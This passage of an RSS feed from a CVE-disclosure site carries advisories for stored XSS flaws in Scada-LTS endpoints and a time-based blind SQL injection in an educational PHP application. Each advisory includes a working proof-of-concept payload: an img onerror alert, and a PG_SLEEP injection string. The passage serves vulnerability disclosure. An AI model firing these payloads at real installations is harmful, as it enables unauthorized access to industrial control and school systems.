    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9234</title>
        <link>https://www.cvehunters.com/p/cve-2025-9234/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9234/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9234-cross-site-scripting-xss-stored-endpoint-maintenance_eventsshtm-parameter-alias&amp;#34;&amp;gt;CVE-2025-9234: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9234-cross-site-scripting-xss-stored-endpoint-maintenance_eventsshtm-parameter-alias&amp;#34;&amp;gt;CVE-2025-9234: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;Maintenance&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9234/image.png&amp;#34;
	width=&amp;#34;865&amp;#34;
	height=&amp;#34;422&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9234/image_hu_2229e4ca9efcb897.png 480w, /p/cve-2025-9234/image_hu_92833fb3a512e8e0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;204&amp;#34;
		data-flex-basis=&amp;#34;491px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9235</title>
        <link>https://www.cvehunters.com/p/cve-2025-9235/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9235/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9235-cross-site-scripting-xss-stored-endpoint-compound_eventsshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9235: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9235-cross-site-scripting-xss-stored-endpoint-compound_eventsshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9235: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9235&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;compound_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;Compound-PoC-XSS&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9235/image.png&amp;#34;
	width=&amp;#34;823&amp;#34;
	height=&amp;#34;475&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9235/image_hu_5f30348700829446.png 480w, /p/cve-2025-9235/image_hu_ef6aa04245283b7a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;173&amp;#34;
		data-flex-basis=&amp;#34;415px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9236</title>
        <link>https://www.cvehunters.com/p/cve-2025-9236/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9236/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9236-sql-injection-blind-time-based-vulnerability-in-nm_tipo-parameter-on-educar_tipo_usuario_lstphp-endpoint&amp;#34;&amp;gt;CVE-2025-9236: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9236-sql-injection-blind-time-based-vulnerability-in-nm_tipo-parameter-on-educar_tipo_usuario_lstphp-endpoint&amp;#34;&amp;gt;CVE-2025-9236: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9236&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_tipo_usuario_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR &amp;amp;#39;EgwO&amp;amp;#39;=&amp;amp;#39;pMdZ
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
